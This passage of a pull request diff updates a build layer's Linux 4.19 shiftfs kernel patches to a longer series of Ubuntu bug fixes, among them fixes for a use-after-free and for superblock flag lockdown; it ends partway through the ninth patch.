### PR TITLE
recipes-kernel/linux/linux-vanilla: updated 4.19 with proper shiftfs

### DIFF
--- a/recipes-kernel/linux/linux-vanilla/4.19/0001-shiftfs-uid-gid-shifting-bind-mount.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0001-shiftfs-uid-gid-shifting-bind-mount.patch
@@ -1,7 +1,9 @@
-From da6538b403b71509c507c7afe5f917c9cb479400 Mon Sep 17 00:00:00 2001
+From 3007386db5399970c584c18900984c813c8e07db Mon Sep 17 00:00:00 2001
 From: James Bottomley <James.Bottomley@HansenPartnership.com>
-Date: Wed, 27 Mar 2019 15:11:25 +0100
-Subject: [PATCH 1/3] shiftfs: uid/gid shifting bind mount
+Date: Thu, 4 Apr 2019 15:39:11 +0200
+Subject: [PATCH 01/23] shiftfs: uid/gid shifting bind mount
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
 
 This allows any subtree to be uid/gid shifted and bound elsewhere.  It
 does this by operating simlarly to overlayfs.  Its primary use is for
@@ -24,10 +26,12 @@ Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
 Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
 [update: port to 5.0]
 Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
 ---
  fs/Kconfig                 |   8 +
  fs/Makefile                |   1 +
- fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++++++++++
+ fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
  include/uapi/linux/magic.h |   2 +
  4 files changed, 791 insertions(+)
  create mode 100644 fs/shiftfs.c
@@ -52,15 +56,14 @@ index ac474a61be37..392c5a41a9f9 100644
  
  source "fs/fscache/Kconfig"
 diff --git a/fs/Makefile b/fs/Makefile
-index 293733f61594..22bc1c35cbe9 100644
+index 293733f61594..d0222f3816bd 100644
 --- a/fs/Makefile
 +++ b/fs/Makefile
-@@ -127,4 +127,5 @@ obj-$(CONFIG_F2FS_FS)		+= f2fs/
- obj-y				+= exofs/ # Multiple modules
+@@ -128,3 +128,4 @@ obj-y				+= exofs/ # Multiple modules
  obj-$(CONFIG_CEPH_FS)		+= ceph/
  obj-$(CONFIG_PSTORE)		+= pstore/
-+obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
  obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
 diff --git a/fs/shiftfs.c b/fs/shiftfs.c
 new file mode 100644
 index 000000000000..f7cada126daa
@@ -859,5 +862,5 @@ index 1a6fee974116..671b0c6d0754 100644
 +
  #endif /* __LINUX_MAGIC_H__ */
 -- 
-2.11.0
+2.20.1
 

--- a/recipes-kernel/linux/linux-vanilla/4.19/0002-shiftfs-rework-and-extend.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0002-shiftfs-rework-and-extend.patch
@@ -1,7 +1,9 @@
-From ed046e47da6b147aa5a4311f208eac7b80647620 Mon Sep 17 00:00:00 2001
+From 0ed42fa6e4f412819431443489344a1c8f3f759c Mon Sep 17 00:00:00 2001
 From: Christian Brauner <christian@brauner.io>
-Date: Wed, 27 Mar 2019 15:11:26 +0100
-Subject: [PATCH 2/3] shiftfs: rework and extend
+Date: Thu, 4 Apr 2019 15:39:12 +0200
+Subject: [PATCH 02/23] shiftfs: rework and extend
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
 
 /* Introduction */
 The shiftfs filesystem is implemented as a stacking filesystem. Since it is
@@ -74,10 +76,12 @@ block devices cannot be created through shiftfs.
 
 Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
 Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
 ---
  fs/Kconfig   |   10 +
- fs/shiftfs.c | 1847 ++++++++++++++++++++++++++++++++++++++++++++++------------
- 2 files changed, 1488 insertions(+), 369 deletions(-)
+ fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
+ 2 files changed, 1493 insertions(+), 369 deletions(-)
 
 diff --git a/fs/Kconfig b/fs/Kconfig
 index 392c5a41a9f9..691f3c4fc7eb 100644
@@ -101,7 +105,7 @@ index 392c5a41a9f9..691f3c4fc7eb 100644
  
  source "fs/fscache/Kconfig"
 diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f7cada126daa..234af4e31736 100644
+index f7cada126daa..ad1ae5bce6c1 100644
 --- a/fs/shiftfs.c
 +++ b/fs/shiftfs.c
 @@ -1,3 +1,4 @@
@@ -812,7 +816,7 @@ index f7cada126daa..234af4e31736 100644
 +static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
 +			 dev_t rdev)
 +{
-+	if (S_ISCHR(mode) || S_ISBLK(mode))
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
 +		return -EPERM;
 +
 +	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
@@ -906,7 +910,7 @@ index f7cada126daa..234af4e31736 100644
  
  	return err;
  }
-@@ -445,304 +644,1205 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
  static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
  				     unsigned int flags)
  {
@@ -1497,7 +1501,7 @@ index f7cada126daa..234af4e31736 100644
 +	lowerfd->file = realfile;
 +
 +	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & lowerfd->file->f_flags))
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
 +		return shiftfs_change_flags(lowerfd->file, file->f_flags);
 +
 +	return 0;
@@ -1513,7 +1517,6 @@ index f7cada126daa..234af4e31736 100644
 +	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
 +	if (!file_info)
 +		return -ENOMEM;
-+	file->private_data = file_info;
 +
 +	realpath = &file_info->realpath;
 +	realpath->mnt = ssi->mnt;
@@ -1521,10 +1524,11 @@ index f7cada126daa..234af4e31736 100644
 +
 +	realfile = shiftfs_open_realfile(file, realpath);
 +	if (IS_ERR(realfile)) {
-+		kfree(file_info);
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
 +		return PTR_ERR(realfile);
 +	}
 +
++	file->private_data = file_info;
 +	file_info->realfile = realfile;
 +	return 0;
 +}
@@ -1533,8 +1537,13 @@ index f7cada126daa..234af4e31736 100644
 +{
 +	struct shiftfs_file_info *file_info = file->private_data;
 +
-+	fput(file_info->realfile);
-+	kmem_cache_free(shiftfs_file_info_cache, file_info);
++	if (file_info) {
++		if (file_info->realfile)
++			fput(file_info->realfile);
++
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	}
++
 +	return 0;
 +}
 +
@@ -2098,7 +2107,8 @@ index f7cada126daa..234af4e31736 100644
 +
 +	return 0;
 +}
-+
+ 
+-	err = -EPERM;
 +static const struct super_operations shiftfs_super_ops = {
 +	.put_super	= shiftfs_put_super,
 +	.show_options	= shiftfs_show_options,
@@ -2126,8 +2136,7 @@ index f7cada126daa..234af4e31736 100644
 +
 +	if (!data->path)
 +		return -EINVAL;
- 
--	err = -EPERM;
++
 +	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
 +	if (!sb->s_fs_info)
 +		return -ENOMEM;
@@ -2298,7 +2307,7 @@ index f7cada126daa..234af4e31736 100644
  	return err;
  }
  
-@@ -764,17 +1864,26 @@ static struct file_system_type shiftfs_type = {
+@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
  
  static int __init shiftfs_init(void)
  {
@@ -2327,5 +2336,5 @@ index f7cada126daa..234af4e31736 100644
  module_init(shiftfs_init)
  module_exit(shiftfs_exit)
 -- 
-2.11.0
+2.20.1
 

--- a/recipes-kernel/linux/linux-vanilla/4.19/0003-shiftfs-support-some-btrfs-ioctls.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0003-shiftfs-support-some-btrfs-ioctls.patch
@@ -1,7 +1,9 @@
-From 3da371001cc7680260b3b8e99f84a0f8398143a4 Mon Sep 17 00:00:00 2001
+From c845bc7a00f53618b69758491ede3c63c7ad960d Mon Sep 17 00:00:00 2001
 From: Christian Brauner <christian@brauner.io>
-Date: Wed, 27 Mar 2019 15:11:27 +0100
-Subject: [PATCH 3/3] shiftfs: support some btrfs ioctls
+Date: Thu, 4 Apr 2019 15:39:13 +0200
+Subject: [PATCH 03/23] shiftfs: support some btrfs ioctls
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
 
 Shiftfs currently only passes through a few ioctl()s to the underlay. These
 are ioctl()s that are generally considered safe. Doing it for random
@@ -39,12 +41,14 @@ problem we need to silently temporarily replace the passed in fd with an fd
 that refers to a file that references a btrfs dentry and inode.
 
 Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
 ---
- fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++--
+ fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
  1 file changed, 151 insertions(+), 5 deletions(-)
 
 diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 234af4e31736..98c9f34ba548 100644
+index ad1ae5bce6c1..678cad30f4a5 100644
 --- a/fs/shiftfs.c
 +++ b/fs/shiftfs.c
 @@ -1,6 +1,8 @@
@@ -79,7 +83,7 @@ index 234af4e31736..98c9f34ba548 100644
  
  static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
  {
-@@ -1340,18 +1356,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
+@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
  	return shiftfs_revert_object_creds(oldcred, newcred);
  }
  
@@ -202,7 +206,7 @@ index 234af4e31736..98c9f34ba548 100644
  
  	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
  	if (ret)
-@@ -1367,9 +1485,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
  out_fdput:
  	fdput(lowerfd);
  
@@ -236,7 +240,7 @@ index 234af4e31736..98c9f34ba548 100644
  static long shiftfs_ioctl(struct file *file, unsigned int cmd,
  			  unsigned long arg)
  {
-@@ -1381,7 +1523,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
  	case FS_IOC_SETFLAGS:
  		break;
  	default:
@@ -247,7 +251,7 @@ index 234af4e31736..98c9f34ba548 100644
  	}
  
  	return shiftfs_real_ioctl(file, cmd, arg);
-@@ -1398,7 +1542,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
  	case FS_IOC32_SETFLAGS:
  		break;
  	default:
@@ -259,5 +263,5 @@ index 234af4e31736..98c9f34ba548 100644
  
  	return shiftfs_real_ioctl(file, cmd, arg);
 -- 
-2.11.0
+2.20.1
 

--- a/recipes-kernel/linux/linux-vanilla/4.19/0004-UBUNTU-SAUCE-shiftfs-use-translated-ids-when-chaning.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0004-UBUNTU-SAUCE-shiftfs-use-translated-ids-when-chaning.patch
@@ -1,0 +1,50 @@
+From 1e4752575f7154b81d75245ed35deae13f805e88 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Thu, 11 Apr 2019 07:31:04 -0500
+Subject: [PATCH 04/23] UBUNTU: SAUCE: shiftfs: use translated ids when chaning
+ lower fs attrs
+
+BugLink: https://bugs.launchpad.net/bugs/1824350
+
+shiftfs_setattr() is preparing a new set of attributes with the
+owner translated for the lower fs, but it then passes the
+original attrs. As a result the owner is set to the untranslated
+owner, which causes the shiftfs inodes to also have incorrect
+ids. For example:
+
+ # mkdir dir
+ # touch file
+ # ls -lh dir file
+ drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
+ -rw-r--r-- 1 root root 0 Apr 11 13:05 file
+ # chown 500:500 dir file
+ # ls -lh dir file
+ drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
+ -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
+
+Fix this to pass the correct iattr struct to notify_change().
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 678cad30f4a5..e736fd6afcb4 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, attr, NULL);
++	err = notify_change(lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0005-UBUNTU-SAUCE-shiftfs-fix-passing-of-attrs-to-underal.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0005-UBUNTU-SAUCE-shiftfs-fix-passing-of-attrs-to-underal.patch
@@ -1,0 +1,62 @@
+From 953cabaa4620bafd5c37cf410648e25fe48153cc Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Sat, 13 Apr 2019 14:41:01 -0500
+Subject: [PATCH 05/23] UBUNTU: SAUCE: shiftfs: fix passing of attrs to
+ underaly for setattr
+
+BugLink: https://bugs.launchpad.net/bugs/1824717
+
+shiftfs_setattr() makes a copy of the attrs it was passed to pass
+to the lower fs. It then calls setattr_prepare() with the original
+attrs, and this may make changes which are not reflected in the
+attrs passed to the lower fs. To fix this, copy the attrs to the
+new struct for the lower fs after calling setattr_prepare().
+
+Additionally, notify_change() may have set ATTR_MODE when one of
+ATTR_KILL_S[UG]ID is set, and passing this combination to
+notify_change() will trigger a BUG(). Do as overlayfs and
+ecryptfs both do, and clear ATTR_MODE if either of those bits
+is set.
+
+Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
+Acked-by: Brad Figg <brad.figg@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+---
+ fs/shiftfs.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e736fd6afcb4..8e064756ea0c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+-	struct iattr newattr = *attr;
++	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	if (err)
+ 		return err;
+ 
++	newattr = *attr;
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	err = notify_change(lowerd, &newattr, NULL);
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0006-UBUNTU-SAUCE-shiftfs-prevent-use-after-free-when-ver.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0006-UBUNTU-SAUCE-shiftfs-prevent-use-after-free-when-ver.patch
@@ -1,0 +1,117 @@
+From 178f4882457a2a4519bb5cb5c449580b29b6a4cf Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Mon, 15 Apr 2019 15:21:55 +0200
+Subject: [PATCH 06/23] UBUNTU: SAUCE: shiftfs: prevent use-after-free when
+ verifying mount options
+
+BugLink: https://bugs.launchpad.net/bugs/1824735
+
+Copy up the passthrough mount settings of the mark mount point to the
+shiftfs overlay.
+
+Before this commit we used to keep a reference to the shiftfs mark
+mount's shiftfs_super_info which was stashed in the superblock of the
+mark mount. The problem is that we only take a reference to the mount of
+the underlay, i.e. the filesystem that is *under* the shiftfs mark
+mount. This means when someone performs a shiftfs mark mount, then a
+shiftfs overlay mount and then immediately unmounts the shiftfs mark
+mount we muck with invalid memory since shiftfs_put_super might have
+already been called freeing that memory.
+
+Another solution would be to start reference counting. But this would be
+overkill. We only care about the passthrough mount option of the mark
+mount. And we only need it to verify that on remount the new passthrough
+options of the shiftfs overlay are a subset of the mark mount's
+passthrough options. In other scenarios we don't care. So copying up is
+good enough and also only needs to happen once on mount, i.e. when a new
+superblock is created and the .fill_super method is called.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+---
+ fs/shiftfs.c | 29 ++++++++++++++++++-----------
+ 1 file changed, 18 insertions(+), 11 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8e064756ea0c..4c8a6ec2a617 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -28,7 +28,7 @@ struct shiftfs_super_info {
+ 	const struct cred *creator_cred;
+ 	bool mark;
+ 	unsigned int passthrough;
+-	struct shiftfs_super_info *info_mark;
++	unsigned int passthrough_mark;
+ };
+ 
+ struct shiftfs_file_info {
+@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
+ 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+ 		return false;
+ 
+-	if (info->info_mark &&
+-	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
+-		return false;
+-
+ 	return true;
+ }
+ 
+@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 
+ 	if (info->passthrough != new.passthrough) {
+ 		/* Don't allow exceeding passthrough options of mark mount. */
+-		if (!passthrough_is_subset(info->info_mark->passthrough,
++		if (!passthrough_is_subset(info->passthrough_mark,
+ 					   info->passthrough))
+ 			return -EPERM;
+ 
+@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 
+ 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
++			/*
++			 * For a new mark passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+ 		sbinfo->creator_cred = prepare_creds();
+@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
+ 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		sbinfo->info_mark = sbinfo_mp;
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0007-UBUNTU-SAUCE-shiftfs-use-separate-llseek-method-for-.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0007-UBUNTU-SAUCE-shiftfs-use-separate-llseek-method-for-.patch
@@ -1,0 +1,68 @@
+From 33dc996d717f800055da01e26e43a68321ddbada Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 16 Apr 2019 18:29:00 +0200
+Subject: [PATCH 07/23] UBUNTU: SAUCE: shiftfs: use separate llseek method for
+ directories
+
+BugLink: https://bugs.launchpad.net/bugs/1824812
+
+Give shiftfs it's own proper llseek method for directories.
+
+Before this commit we used to rely on an llseek method that was
+targeted for regular files for both directories and regular files.
+However, the realfile's f_pos was not correctly handled when userspace
+called lseek(2) on a shiftfs directory file. Give directories their
+own llseek operation so that seeking on a directory file is properly
+supported.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4c8a6ec2a617..9771165d1ce0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
+ {
+ 	struct inode *realinode = file_inode(file)->i_private;
+ 
+@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ const struct file_operations shiftfs_file_operations = {
+ 	.open			= shiftfs_open,
+ 	.release		= shiftfs_release,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_file_llseek,
+ 	.read_iter		= shiftfs_read_iter,
+ 	.write_iter		= shiftfs_write_iter,
+ 	.fsync			= shiftfs_fsync,
+@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+-	.llseek			= shiftfs_llseek,
++	.llseek			= shiftfs_dir_llseek,
+ 	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+ 	.release		= shiftfs_release,
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0008-UBUNTU-SAUCE-shiftfs-lock-down-certain-superblock-fl.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0008-UBUNTU-SAUCE-shiftfs-lock-down-certain-superblock-fl.patch
@@ -1,0 +1,123 @@
+From 83254f2b09a68107a2233e1f5475f01a5dfef048 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Wed, 8 May 2019 14:13:00 +0200
+Subject: [PATCH 08/23] UBUNTU: SAUCE: shiftfs: lock down certain superblock
+ flags
+
+BugLink: https://bugs.launchpad.net/bugs/1827122
+
+This locks down various superblock flags to prevent userns-root from
+remounting a superblock with less restrictive options than the original
+mark or underlay mount.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 46 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9771165d1ce0..a1dae7ea593b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
+ 	return true;
+ }
+ 
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
+ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ {
+ 	int err;
+@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (err)
+ 		return err;
+ 
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
+ 	/* Mark mount option cannot be changed. */
+ 	if (info->mark || (info->mark != new.mark))
+ 		return -EPERM;
+@@ -1847,6 +1878,16 @@ struct shiftfs_data {
+ 	const char *path;
+ };
+ 
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
+ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			      int silent)
+ {
+@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	sb->s_flags |= SB_POSIXACL;
++
+ 	if (sbinfo->mark) {
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+ 
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
+ 		/*
+ 		 * Handle nesting of shiftfs mounts by referring this mark
+ 		 * mount back to the original mark mount. This is more
+@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		 * passthrough settings.
+ 		 */
+ 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
+ 	}
+ 
+ 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
+@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-	sb->s_flags |= SB_POSIXACL;
+ 	sb->s_root = d_make_root(inode);
+ 	if (!sb->s_root) {
+ 		err = -ENOMEM;
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0009-UBUNTU-SAUCE-shiftfs-allow-changing-ro-rw-for-subvol.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0009-UBUNTU-SAUCE-shiftfs-allow-changing-ro-rw-for-subvol.patch
@@ -1,0 +1,87 @@
+From 0ab8e5f0228c4a5ba1c1898b9e31508c536a1ac2 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Tue, 11 Jun 2019 11:47:00 +0200
+Subject: [PATCH 09/23] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for
+ subvolumes
+
+BugLink: https://bugs.launchpad.net/bugs/1832316
+
+This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
+
+Currently, btrfs workloads employing shiftfs cause regression.
+With btrfs unprivileged users can already toggle whether a subvolume
+will be ro or rw. This is broken on current shiftfs as we haven't
+whitelisted these ioctls().
+To prevent such regression, we need to whitelist the ioctls
